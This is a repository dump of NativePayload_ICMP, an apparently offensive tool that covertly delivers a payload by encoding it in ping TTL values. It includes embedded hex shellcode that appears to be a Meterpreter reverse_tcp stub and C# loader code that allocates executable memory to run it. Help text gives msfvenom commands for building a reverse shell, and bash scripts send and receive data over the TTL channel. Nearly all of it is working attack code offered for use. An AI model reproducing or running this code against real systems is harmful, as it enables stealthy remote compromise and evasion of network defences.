ProcessWindowStyle.Hidden; 524 | nslookup.Start(); 525 | 526 | //string result_Line0 = ""; 527 | string Pingoutput = nslookup.StandardOutput.ReadToEnd(); 528 | string[] All_lines = Pingoutput.Split('\t', '\n'); 529 | 530 | //int PayloadLines_current_id = 0; 531 | foreach (var item in All_lines) 532 | { 533 | if (item.StartsWith("Reply ")) 534 | { 535 | Final_Dec = item.Substring(item.Length - 4); 536 | } 537 | // debug 538 | // Console.WriteLine(item + "\n"+ s); 539 | } 540 | 541 | } 542 | catch (Exception e) 543 | { 544 | 545 | Console.WriteLine(e.Message); 546 | } 547 | return Final_Dec; 548 | } 549 | 550 | public static UInt32 MEM_COMMIT = 0x1000; 551 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 552 | 553 | [DllImport("kernel32")] 554 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 555 | [DllImport("kernel32")] 556 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 557 | [DllImport("kernel32")] 558 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 559 | } 560 | } 561 | -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/NativePayload_ICMP.png -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=1; 5 | temp=""; 6 | tput setaf 7; 7 | echo 8 | echo "NativePayload_ICMP.sh Download Payload by ICMPv4 Traffic via 'TTL' "; 9 | echo "NativePayload_ICMP v1.0 , Published by Damon Mohammadbagher 2017-2018 "; 10 | tput setaf 9; 11 | if [ "$1" == $'help' ] ; 12 | then 13 | echo 14 | echo "step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext \"your text or string\""; 15 | echo "step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen \"w.x.y.z\""; 16 | echo "Note: in step1 you should use Client-side system w.x.y.z IPv4Address"; 17 | echo 18 | fi 19 | 20 | if [ "$1" == $'shtext' ] ; 21 | then 22 | #textpayload=`echo $2$'\157' | xxd -p` 23 | textpayload=`echo -n $2 | od -A n -t x1` 24 | ttlpayload=""; 25 | mytemp=""; 26 | echo 27 | echo "[!] your payload Text:" $2; 28 | echo "[!] your payload bytes:" $textpayload; 29 | for pay in `echo $textpayload | xxd -c 1` 30 | do 31 | case $pay in 32 | 0) 33 | if [ "$mytemp" != $'0' ] ; 34 | then 35 | ttlpayload+="100" 36 | fi 37 | ;; 38 | 1) 39 | if [ "$mytemp" != $'1' ] ; 40 | then 41 | ttlpayload+="101" 42 | fi 43 | ;; 44 | 2) 45 | if [ "$mytemp" != $'2' ] ; 46 | then 47 | ttlpayload+="102" 48 | fi 49 | ;; 50 | 3) 51 | if [ "$mytemp" != $'3' ] ; 52 | then 53 | ttlpayload+="103" 54 | fi 55 | ;; 56 | 4) 57 | if [ "$mytemp" != $'4' ] ; 58 | then 59 | ttlpayload+="104" 60 | fi 61 | ;; 62 | 5) 63 | if [ "$mytemp" != $'5' ] ; 64 | then 65 | ttlpayload+="105" 66 | fi 67 | ;; 68 | 6) 69 | if [ "$mytemp" != $'6' ] ; 70 | then 71 | ttlpayload+="106" 72 | fi 73 | ;; 74 | 7) 75 | if [ "$mytemp" != $'7' ] ; 76 | then 77 | ttlpayload+="107" 78 | fi 79 | ;; 80 | 8) 81 | if [ "$mytemp" != $'8' ] ; 82 | then 83 | ttlpayload+="108" 84 | fi 85 | ;; 86 | 9) 87 | if [ "$mytemp" != $'9' ] ; 88 | then 89 | ttlpayload+="109" 90 | fi 91 | ;; 92 | a) 93 | if [ "$mytemp" != $'a' ] ; 94 | then 95 | ttlpayload+="110" 96 | fi 97 | ;; 98 | b) 99 | if [ "$mytemp" != $'b' ] ; 100 | then 101 | ttlpayload+="111" 102 | fi 103 | ;; 104 | c) 105 | if [ "$mytemp" != $'c' ] ; 106 | then 107 | ttlpayload+="112" 108 | fi 109 | ;; 110 | d) 111 | if [ "$mytemp" != $'d' ] ; 112 | then 113 | ttlpayload+="113" 114 | fi 115 | ;; 116 | e) 117 | if [ "$mytemp" != $'e' ] ; 118 | then 119 | ttlpayload+="114" 120 | fi 121 | ;; 122 | f) 123 | if [ "$mytemp" != $'f' ] ; 124 | then 125 | ttlpayload+="115" 126 | fi 127 | ;; 128 | esac 129 | mytemp=$pay; 130 | done 131 | #echo $ttlpayload; 132 | mytemp2=""; 133 | Finalttlpayload=""; 134 | for pay2 in `echo $ttlpayload | xxd -g 0 -c 3 | awk {'print $3'}` 135 | do 136 | if [ "$mytemp2" == "$pay2" ] 137 | then 138 | Finalttlpayload+="253""$pay2"; 139 | fi 140 | if [ "$mytemp2" != "$pay2" ] 141 | then 142 | Finalttlpayload+=$pay2; 143 | fi 144 | mytemp2=$pay2 145 | done 146 | echo 147 | 148 | #echo "your TTL payload:" $Finalttlpayload 149 | 150 | # Finalttlpayload=`echo "${Finalttlpayload::-6}"`; 151 | mylength=`echo ${#Finalttlpayload}` 152 | div=3; 153 | length=$((mylength / div)); 154 | 155 | echo "[!] your TTL payload:" $Finalttlpayload; 156 | tput setaf 3; 157 | echo "[!] at least you need ("$length") Times to change TTL value"; 158 | echo "[!] at least you need ("$length "* 2) Ping Request/Response"; 159 | tput setaf 9; 160 | echo "[>] Start Flag , change TTL value to '254' with sleep 5)"; 161 | sudo sysctl net.ipv4.ip_default_ttl=254; sleep 5; 162 | echo "[>] Running sysctl command for change TTL values (Default sleep is 2)"; 163 | echo 164 | 165 | for TTLs in `echo $Finalttlpayload | xxd -p -c 3` 166 | do 167 | string=`echo $TTLs | xxd -r -p` 168 | if [ "$string" != $'' ] && [ "$string" != $'.' ]; 169 | then 170 | echo "sudo sysctl net.ipv4.ip_default_ttl="$string "; sleep 2"; 171 | sudo sysctl net.ipv4.ip_default_ttl=$string; sleep 2; 172 | fi 173 | done 174 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 175 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 2; 176 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2; 177 | fi 178 | if [ "$1" == $'listen' ] ; 179 | then 180 | while (true) 181 | do 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | ((PingRequest++)); 184 | 185 | string=`ping $2 -c 1 | grep -e ttl= | awk {'print $6'}` 186 | echo 187 | string=`echo $string | cut -d'=' -f2` 188 | 189 | case $string in 190 | 100) 191 | tput setaf 2; 192 | echo "[$Time]" "Dumped Byte via TTL : 0" 193 | if (( $temp != 100 )) ; 194 | then 195 | payload+="0" 196 | fi 197 | ;; 198 | 101) 199 | tput setaf 2; 200 | echo "[$Time]" "Dumped Byte via TTL : 1" 201 | if (( $temp != 101 )) ; 202 | then 203 | payload+="1" 204 | fi 205 | ;; 206 | 102) 207 | tput setaf 2; 208 | echo "[$Time]" "Dumped Byte via TTL : 2" 209 | if (( $temp != 102 )) ; 210 | then 211 | payload+="2" 212 | fi 213 | ;; 214 | 103) 215 | tput setaf 2; 216 | echo "[$Time]" "Dumped Byte via TTL : 3" 217 | if (( $temp != 103 )) ; 218 | then 219 | payload+="3" 220 | fi 221 | ;; 222 | 104) 223 | tput setaf 2; 224 | echo "[$Time]" "Dumped Byte via TTL : 4" 225 | if (( $temp != 104 )) ; 226 | then 227 | payload+="4" 228 | fi 229 | ;; 230 | 105) 231 | tput setaf 2; 232 | echo "[$Time]" "Dumped Byte via TTL : 5" 233 | if (( $temp != 105 )) ; 234 | then 235 | payload+="5" 236 | fi 237 | ;; 238 | 106) 239 | tput setaf 2; 240 | echo "[$Time]" "Dumped Byte via TTL : 6" 241 | if (( $temp != 106 )) ; 242 | then 243 | payload+="6" 244 | fi 245 | ;; 246 | 107) 247 | tput setaf 2; 248 | echo "[$Time]" "Dumped Byte via TTL : 7" 249 | if (( $temp != 107 )) ; 250 | then 251 | payload+="7" 252 | fi 253 | ;; 254 | 108) 255 | tput setaf 2; 256 | echo "[$Time]" "Dumped Byte via TTL : 8" 257 | if (( $temp != 108 )) ; 258 | then 259 | payload+="8" 260 | fi 261 | ;; 262 | 109) 263 | tput setaf 2; 264 | echo "[$Time]" "Dumped Byte via TTL : 9" 265 | if (( $temp != 109 )) ; 266 | then 267 | payload+="9" 268 | fi 269 | ;; 270 | 110) 271 | tput setaf 2; 272 | echo "[$Time]" "Dumped Byte via TTL : a" 273 | if (( $temp != 110 )) ; 274 | then 275 | payload+="a" 276 | fi 277 | ;; 278 | 111) 279 | tput setaf 2; 280 | echo "[$Time]" "Dumped Byte via TTL : b" 281 | if (( $temp != 111 )) ; 282 | then 283 | payload+="b" 284 | fi 285 | ;; 286 | 112) 287 | tput setaf 2; 288 | echo "[$Time]" "Dumped Byte via TTL : c" 289 | if (( $temp != 112 )) ; 290 | then 291 | payload+="c" 292 | fi 293 | ;; 294 | 113) 295 | tput setaf 2; 296 | echo "[$Time]" "Dumped Byte via TTL : d" 297 | if (( $temp != 113 )) ; 298 | then 299 | payload+="d" 300 | fi 301 | ;; 302 | 114) 303 | tput setaf 2; 304 | echo "[$Time]" "Dumped Byte via TTL : e" 305 | if (( $temp != 114 )) ; 306 | then 307 | payload+="e" 308 | fi 309 | ;; 310 | 115) 311 | tput setaf 2; 312 | echo "[$Time]" "Dumped Byte via TTL : f" 313 | if (( $temp != 115 )) ; 314 | then 315 | payload+="f" 316 | fi 317 | ;; 318 | 255) 319 | tput setaf 1; 320 | echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' " 321 | 322 | ((c++)); 323 | 324 | if (( $c == 15 )) ; 325 | then 326 | break 327 | fi 328 | ;; 329 | 253) 330 | tput setaf 3; 331 | echo "[$Time] ," $c ":Dumped Double Flag 'ttl 253' " 332 | ;; 333 | esac 334 | 335 | temp=$string; 336 | 337 | tput setaf 9; 338 | echo "Ping Requests:" $PingRequest 339 | echo "your Payload :" $payload 340 | tput setaf 9; 341 | 342 | #final=`echo $payload | xxd -r -p` 343 | 344 | final=`echo -n $payload | od -A n -t x1 | xxd -r -p | xxd -r -p` 345 | echo "your Data : " $final 346 | 347 | sleep 1; 348 | done 349 | fi 350 | 351 | -------------------------------------------------------------------------------- /EBOOK/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_ICMP v2.0 2 | 3 | "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 Released for Ebook. (May 2018 , bug fixed). 4 | 5 | Article step by step : https://www.peerlyst.com/posts/transfer-download-payload-by-icmpv4-traffic-via-ttl-damon-mohammadbagher 6 | 7 | NativePayload_ICMP.exe v2.0 syntax: 8 | NativePayload_ICMP.exe help 9 | 10 | NativePayload_ICMP.sh v1.0 syntax: 11 | step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext "your text or string" 12 | step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen "w.x.y.z" 13 | Note: in step1 you should use Client-side system w.x.y.z IPv4Address 14 | help syntax : ./NativePayload_ICMP.sh help 15 | 16 | # 1.Demo step by step (linux only): 17 | 18 | step 1 (client side with IPv4 192.168.56.10): ./script(for test).sh 19 | 20 | step 1-2 (server side with IPv4 192.168.56.13) : ./NativePayload_ICMP.sh listen 192.168.56.10 21 | 22 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 23 | 24 | # 2.Demo step by step (linux only): 25 | 26 | step 1 (client side with IPv4 192.168.56.10): ./NativePayload_ICMP.sh shtext "it's all inside of me it's all inside of you ... you will see" 27 | 28 | step 1-2 (server side with IPv4 192.168.56.13) : ./NativePayload_ICMP.sh listen 192.168.56.10 29 | 30 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 31 | 32 | # 3.Demo step by step (windows and linux): 33 | 34 | step 1 (client side with IPv4 192.168.56.10): ./NativePayload_ICMP.sh shtext "it's all inside of me it's all inside of you ... you will see" 35 | 36 | step 1-2 (server side with IPv4 192.168.56.13) : NativePayload_ICMP.exe listen 192.168.56.10 37 | 38 | Note: you should execute "step1-2" , immediately after 2 or 3 seconds. 39 | 40 | Picture for Demo 2 : 41 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/EBOOK/NativePayload_ICMP.png) 42 | 43 | Picture for Demo 3 : 44 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/EBOOK/NativePayload_ICMP(WindowsLinux).png) 45 | 46 | -------------------------------------------------------------------------------- /EBOOK/old_version/NativePayload_ICMP(old version).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=0; 5 | temp=""; 6 | while (true) 7 | do 8 | Time=`date '+%d/%m/%Y %H:%M:%S'` 9 | ((PingRequest++)); 10 | 11 | string=`ping $1 -c 1 | grep -e ttl= | awk {'print $6'}` 12 | echo 13 | string=`echo $string | cut -d'=' -f2` 14 | 15 | case $string in 16 | 100) 17 | tput setaf 2; 18 | echo "[$Time]" "Dumped Byte via TTL : 0" 19 | if (( $temp != 100 )) ; 20 | then 21 | payload+="0" 22 | fi 23 | ;; 24 | 101) 25 | tput setaf 2; 26 | echo "[$Time]" "Dumped Byte via TTL : 1" 27 | if (( $temp != 101 )) ; 28 | then 29 | payload+="1" 30 | fi 31 | ;; 32 | 102) 33 | tput setaf 2; 34 | echo "[$Time]" "Dumped Byte via TTL : 2" 35 | if (( $temp != 102 )) ; 36 | then 37 | payload+="2" 38 | fi 39 | ;; 40 | 103) 41 | tput setaf 2; 42 | echo "[$Time]" "Dumped Byte via TTL : 3" 43 | if (( $temp != 103 )) ; 44 | then 45 | payload+="3" 46 | fi 47 | ;; 48 | 104) 49 | tput setaf 2; 50 | echo "[$Time]" "Dumped Byte via TTL : 4" 51 | if (( $temp != 104 )) ; 52 | then 53 | payload+="4" 54 | fi 55 | ;; 56 | 105) 57 | tput setaf 2; 58 | echo "[$Time]" "Dumped Byte via TTL : 5" 59 | if (( $temp != 105 )) ; 60 | then 61 | payload+="5" 62 | fi 63 | ;; 64 | 106) 65 | tput setaf 2; 66 | echo "[$Time]" "Dumped Byte via TTL : 6" 67 | if (( $temp != 106 )) ; 68 | then 69 | payload+="6" 70 | fi 71 | ;; 72 | 107) 73 | tput setaf 2; 74 | echo "[$Time]" "Dumped Byte via TTL : 7" 75 | if (( $temp != 107 )) ; 76 | then 77 | payload+="7" 78 | fi 79 | ;; 80 | 108) 81 | tput setaf 2; 82 | echo "[$Time]" "Dumped Byte via TTL : 8" 83 | if (( $temp != 108 )) ; 84 | then 85 | payload+="8" 86 | fi 87 | ;; 88 | 109) 89 | tput setaf 2; 90 | echo "[$Time]" "Dumped Byte via TTL : 9" 91 | if (( $temp != 109 )) ; 92 | then 93 | payload+="9" 94 | fi 95 | ;; 96 | 110) 97 | tput setaf 2; 98 | echo "[$Time]" "Dumped Byte via TTL : a" 99 | if (( $temp != 110 )) ; 100 | then 101 | payload+="a" 102 | fi 103 | ;; 104 | 111) 105 | tput setaf 2; 106 | echo "[$Time]" "Dumped Byte via TTL : b" 107 | if (( $temp != 111 )) ; 108 | then 109 | payload+="b" 110 | fi 111 | ;; 112 | 112) 113 | tput setaf 2; 114 | echo "[$Time]" "Dumped Byte via TTL : c" 115 | if (( $temp != 112 )) ; 116 | then 117 | payload+="c" 118 | fi 119 | ;; 120 | 113) 121 | tput setaf 2; 122 | echo "[$Time]" "Dumped Byte via TTL : d" 123 | if (( $temp != 113 )) ; 124 | then 125 | payload+="d" 126 | fi 127 | ;; 128 | 114) 129 | tput setaf 2; 130 | echo "[$Time]" "Dumped Byte via TTL : e" 131 | if (( $temp != 114 )) ; 132 | then 133 | payload+="e" 134 | fi 135 | ;; 136 | 115) 137 | tput setaf 2; 138 | echo "[$Time]" "Dumped Byte via TTL : f" 139 | if (( $temp != 115 )) ; 140 | then 141 | payload+="f" 142 | fi 143 | ;; 144 | 255) 145 | tput setaf 1; 146 | echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' " 147 | 148 | ((c++)); 149 | 150 | if (( $c == 25 )) ; 151 | then 152 | break 153 | fi 154 | ;; 155 | esac 156 | 157 | temp=$string; 158 | 159 | tput setaf 9; 160 | echo "Ping Requests:" $PingRequest 161 | echo "your Payload :" $payload 162 | tput setaf 9; 163 | final=`echo $payload | xxd -r -p` 164 | echo "your Data : " $final 165 | sleep 1; 166 | done 167 | 168 | -------------------------------------------------------------------------------- /EBOOK/old_version/README.md: -------------------------------------------------------------------------------- 1 | old version 2 | -------------------------------------------------------------------------------- /EBOOK/old_version/finish.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/finish.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 0.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 1.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 2.png -------------------------------------------------------------------------------- /EBOOK/old_version/step 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/old_version/step 3.png -------------------------------------------------------------------------------- /EBOOK/script(for test).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo sysctl net.ipv4.ip_default_ttl=254; 4 | sleep 5; 5 | TtlPayload="106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100107109106115107105102114102100106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100106113106105102100102114102114102114102100107109106115107105102100107255107106109106112106112102100107103106105106105"; 6 | for pay in `echo $TtlPayload | xxd -p -c 3` 7 | do 8 | str=`echo $pay | xxd -r -p` 9 | if [ "$str" != $'' ]; 10 | then 11 | echo "sudo sysctl net.ipv4.ip_default_ttl="$str "; sleep 2;" 12 | sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2; 13 | fi 14 | done 15 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 16 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 17 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 18 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 19 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 20 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 21 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 22 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 23 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 24 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 25 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 26 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 27 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 28 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 29 | sudo sysctl net.ipv4.ip_default_ttl=255; 30 | echo "Done."; 31 | 32 | -------------------------------------------------------------------------------- /NativePayload_ICMP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Diagnostics; 6 | using System.Data; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace NativePayload_ICMP 10 | { 11 | class Program 12 | { 13 | static string payload = "fc4883e4f0e8cc0000004151415052" 14 | + "51564831d265488b5260488b521848" 15 | + "8b5220488b7250480fb74a4a4d31c9" 16 | + "4831c0ac3c617c022c2041c1c90d41" 17 | + "01c1e2ed524151488b52208b423c48" 18 | + "01d0668178180b020f85720000008b" 19 | + "80880000004885c074674801d0508b" 20 | + "4818448b40204901d0e35648ffc941" 21 | + "8b34884801d64d31c94831c0ac41c1" 22 | + "c90d4101c138e075f14c034c240845" 23 | + "39d175d858448b40244901d066418b" 24 | + "0c48448b401c4901d0418b04884801" 25 | + "d0415841585e595a41584159415a48" 26 | + "83ec204152ffe05841595a488b12e9" 27 | + "4bffffff5d49be7773325f33320000" 28 | + "41564989e64881eca00100004989e5" 29 | + "49bc0200115cc0a8013241544989e4" 30 | + "4c89f141ba4c772607ffd54c89ea68" 31 | + "010100005941ba29806b00ffd56a05" 32 | + "415e50504d31c94d31c048ffc04889" 33 | + "c248ffc04889c141baea0fdfe0ffd5" 34 | + "4889c76a1041584c89e24889f941ba" 35 | + "99a57461ffd585c0740a49ffce75e5" 36 | + "e8930000004883ec104889e24d31c9" 37 | + "6a0441584889f941ba02d9c85fffd5" 38 | + "83f8007e554883c4205e89f66a4041" 39 | + "59680010000041584889f24831c941" 40 | + "ba58a453e5ffd54889c34989c74d31" 41 | + "c94989f04889da4889f941ba02d9c8" 42 | + "5fffd583f8007d2858415759680040" 43 | + "000041586a005a41ba0b2f0f30ffd5" 44 | + "575941ba756e4d61ffd549ffcee93c" 45 | + "ffffff4801c34829c64885f675b441" 46 | + "ffe7586a005949c7c2f0b5a256ffd5"; 47 | 48 | public static DataTable Hex_Dec_Table; 49 | 50 | 51 | static string help = "\n"+"NativePayload_ICMP Published by Damon Mohammadbagher"+"\n\n"+"NativePayload_ICMP null ==> PAYLOAD generate auto" + "\n" 52 | + "NativePayload_ICMP null \"ffccab1cd01f0400 ....\" Input your meterpreter payload to making sh file" + "\n\n" 53 | + "example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt" + "\n" 54 | + "note: copy your msfvenom output payloads to 'Payload string' like 'fc4883e4f0e8cc00000415141505265'" + "\n" 55 | + "example step2 c:\\> NativePayload_ICMP.exe null \"Payload string\" > script.sh" + "\n" 56 | + "example step2 c:\\> NativePayload_ICMP.exe null \"fc4883e4f0e8cc00000415141505265\" > script.sh" + "\n" 57 | + "example step3 c:\\> NativePayload_ICMP.exe ipaddress (sending ICMPv4 traffic to this ipaddress by ping" + "\n" 58 | + "example step3 c:\\> NativePayload_ICMP.exe 192.168.1.50" + "\n" 59 | + "example step4 linux side ./script.sh " + "\n" 60 | + "note: after chmod also adding #!/bin/bash to script.sh file , you can run this script in PING Responder system." + "\n\n" 61 | + "note: you should run this script in your linux after step3 for Response to PING traffic from backdoor system" + "\n" 62 | + "note: Backdoor system is win with NativePayload_ICMP.exe and ipaddress for example: 192.168.1.120" + "\n" 63 | + "note: PING Responder system is linux with ./script.sh and ipaddress for example : 192.168.1.50" + "\n" 64 | + "note: PING Responder system is also Meterpreter Listener by ipaddress : 192.168.1.50" + "\n\n" 65 | + "" + "\n" 66 | + "in this case after 1020 ping request and response you have Meterpreter Session by ICMPv4" + "\n" 67 | + "Dumping Payloads by TTL in PING Response..." + "\n" 68 | + "Meterpreter Payload is 510 bytes" + "\n" 69 | + " 510 * 2 = 1020" + "\n" 70 | + " 0 ... 1019 = 1020 Request" + "\n" 71 | + "" + "\n"; 72 | 73 | 74 | static void Main(string[] args) 75 | { 76 | try 77 | { 78 | 79 | 80 | Hex_Dec_Table = new DataTable(); 81 | 82 | Hex_Dec_Table.Columns.Add("Dec", typeof(int)); 83 | Hex_Dec_Table.Columns.Add("Hex", typeof(string)); 84 | 85 | for (int i = 0; i <= 15; i++) 86 | { 87 | if (i <= 9) 88 | { 89 | Hex_Dec_Table.Rows.Add(i, i.ToString()); 90 | } 91 | else if (i >= 10) 92 | { 93 | switch (i) 94 | { 95 | case 10: 96 | { 97 | Hex_Dec_Table.Rows.Add(i, "a"); 98 | } 99 | break; 100 | case 11: 101 | { 102 | Hex_Dec_Table.Rows.Add(i, "b"); 103 | } 104 | break; 105 | case 12: 106 | { 107 | Hex_Dec_Table.Rows.Add(i, "c"); 108 | } 109 | break; 110 | case 13: 111 | { 112 | Hex_Dec_Table.Rows.Add(i, "d"); 113 | } 114 | break; 115 | case 14: 116 | { 117 | Hex_Dec_Table.Rows.Add(i, "e"); 118 | } 119 | break; 120 | case 15: 121 | { 122 | Hex_Dec_Table.Rows.Add(i, "f"); 123 | } 124 | break; 125 | // default: 126 | } 127 | 128 | } 129 | 130 | } 131 | if (args[0].ToUpper() == "HELP") 132 | { 133 | Console.WriteLine(help); 134 | } 135 | else if (args[0].ToUpper() == "NULL") 136 | { 137 | 138 | //// NativePayload_ICMP null ==> PAYLOAD generate auto 139 | //// NativePayload_ICMP null "ffccab1cd01f0400 ...." Input your meterpreter payload to making sh file 140 | //// example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt 141 | //// copy your msfvenom output payloads to "Payload string" like "fc4883e4f0e8cc00000415141505265" 142 | //// example step2 c:\> NativePayload_ICMP.exe null "Payload string" > script.sh 143 | //// example step2 c:\> NativePayload_ICMP.exe null "fc4883e4f0e8cc00000415141505265" > script.sh 144 | //// example step3 c:\> NativePayload_ICMP.exe 192.168.1.50 145 | //// example step4 linux side ./script.sh 146 | //// note: after adding #!/bin/bash to script.sh file run that ;) 147 | if (args.Length == 2) { payload = args[1]; } 148 | string ff = ""; 149 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "254" + " ; " + "sleep 1 ; \n"); 150 | 151 | //// sysctl used to changing TTL for ping respnse by ping and ICMPv4 response 152 | //// so i do this by TTL = 100 up tp 115 153 | //// if you want do this by TTL 200 you should change your code here 154 | //// something like this 155 | //// Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + 2 + ss.Remove(0,1) + " ; " + "sleep 2 ; \n"); 156 | //// or you can change this Dic --> HexDic values 157 | //// something like this 158 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 159 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 160 | //// TTL 254 is flag for starting 161 | //// TTL 255 is flag for adding new TTL for new Payload 162 | 163 | for (int i = 0; i < payload.Length; ) 164 | { 165 | 166 | if (i != payload.Length) 167 | { 168 | ff = payload.Substring(i, 1); 169 | string ss = _HextoDecimal(ff); 170 | // debug only 171 | //Console.WriteLine(ff + " " + ss); 172 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 173 | Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 174 | Console.WriteLine(); 175 | 176 | i++; 177 | 178 | } 179 | 180 | } 181 | 182 | 183 | //// debug only print codes by dec ;) 184 | //string fff; 185 | //for (int bb = 0; bb < payload.Length; ) 186 | //{ 187 | // fff = payload.Substring(bb, 1); 188 | // string ss = _HextoDecimal(fff); 189 | // Console.Write(ss.Substring(1, 2)); 190 | // bb++; 191 | //} 192 | 193 | } 194 | else 195 | { 196 | bool flag_end = false; 197 | bool init = false; 198 | int flag_end_count = 0; 199 | int Payload_counter = 0; 200 | string temp = ""; 201 | string start_time, end_time = ""; 202 | start_time = DateTime.Now.ToString(); 203 | string Oonaggi = ""; 204 | Console.ForegroundColor = ConsoleColor.Gray; 205 | Console.WriteLine(); 206 | Console.WriteLine("NativePaylaod_ICMPv4 Published by Damon Mohammadbagher"); 207 | Console.WriteLine("Strat Sending ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 208 | Console.WriteLine(); 209 | while (true) 210 | { 211 | 212 | 213 | if (flag_end) break; 214 | 215 | //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;) 216 | string getcode = _Ping(args[0], 1); 217 | try 218 | { 219 | 220 | getcode = getcode.Remove(getcode.Length - 1, 1); 221 | } 222 | catch (Exception e1) 223 | { 224 | Console.ForegroundColor = ConsoleColor.Red; 225 | Console.WriteLine("e1 : " + e1.Message); 226 | Console.WriteLine(); 227 | Console.WriteLine("Error : it is not good ;( "); 228 | Console.WriteLine("Please run this tool again"); 229 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 230 | Console.ForegroundColor = ConsoleColor.Gray; 231 | break; 232 | 233 | } 234 | 235 | if (getcode == "254") { init = true; } 236 | 237 | if (getcode != "255") 238 | { 239 | flag_end_count = 0; 240 | if (getcode != temp && getcode != "255") 241 | { 242 | if (init && getcode != "254") 243 | { 244 | Console.ForegroundColor = ConsoleColor.Green; 245 | Console.Write("{0} , Dump:{1},", DateTime.Now.ToString(), Payload_counter.ToString()); 246 | Console.ForegroundColor = ConsoleColor.Cyan; 247 | //string dd = _HextoDecimal(getcode.Substring(1, 2)); 248 | Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2)); 249 | Oonaggi += getcode.Substring(getcode.Length - 2, 2); 250 | Console.ForegroundColor = ConsoleColor.Green; 251 | Console.WriteLine("from {0} final: {1}", args[0], getcode); 252 | Payload_counter++; 253 